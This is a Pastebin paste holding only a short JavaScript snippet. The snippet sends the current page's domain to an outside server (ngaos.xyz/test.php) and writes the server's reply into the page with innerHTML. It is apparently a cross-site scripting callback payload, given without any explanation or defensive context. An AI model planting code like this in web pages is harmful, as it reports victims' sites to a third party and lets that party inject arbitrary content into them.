Advertisement
vovantthong

Untitled

Nov 27th, 2019
166
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.37 KB | None | 0 0
  1. var xhttp = new XMLHttpRequest();
  2. xhttp.onreadystatechange = function() {
  3. if (this.readyState == 4 && this.status == 200) {
  4. // Typical action to be performed when the document is ready:
  5. document.getElementById("demo").innerHTML = xhttp.responseText;
  6. }
  7. };
  8. xhttp.open("GET", "http://ngaos.xyz/test.php?data="+document.domain, true);
  9. xhttp.send();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement